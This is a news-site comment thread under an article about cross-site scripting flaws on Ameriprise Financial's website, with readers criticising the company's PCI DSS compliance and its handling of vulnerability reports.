back to article Security bugs crawl all over financial giant’s website

For the past five months, a website for investment services giant Ameriprise Financial contained bugs that allowed even low-level criminals to inject malicious content into official company webpages and steal user's cookies, according to a web security expert. The XSS, or cross-site scripting, flaws made it possible for …


This topic is closed for new posts.
  1. M 2


    Obviously these guys handle CCard details and therefore need to PCI DSS compliant..... this is one of those occasions where the Security Standards Council / Card Issuers need to use the big stick and impose sanctions (ie revoke certification and resultant fines) as they would for a company that size that has not achieved compliance by their target date.

    To say... 'I have no idea if someone reported a vulnerability. But I am going to do nothing about how we handle vuln reporting" is tottally unacceptable and quite apart from the failure to comply to Requirement 6.5 (secure development of websites) it is surely also refusing to comply with 12.9 "Implement an Incident Response plan" or Req 5 "Maintain a Vulnerability Management Program".

    Tottally lame..... if I had any business with them (which I don't) I would be pulling it and moving to someone else. If the PCI SSC is not going to use the big stick, then the public needs to when companies display this type of attitude..... by voting with their feet!



  2. Anonymous Coward
    Anonymous Coward

    Oh dear

    "Please to fix this pwntastic code"? I wouldn't be inclined to take them seriously either.

This topic is closed for new posts.

Other stories you might like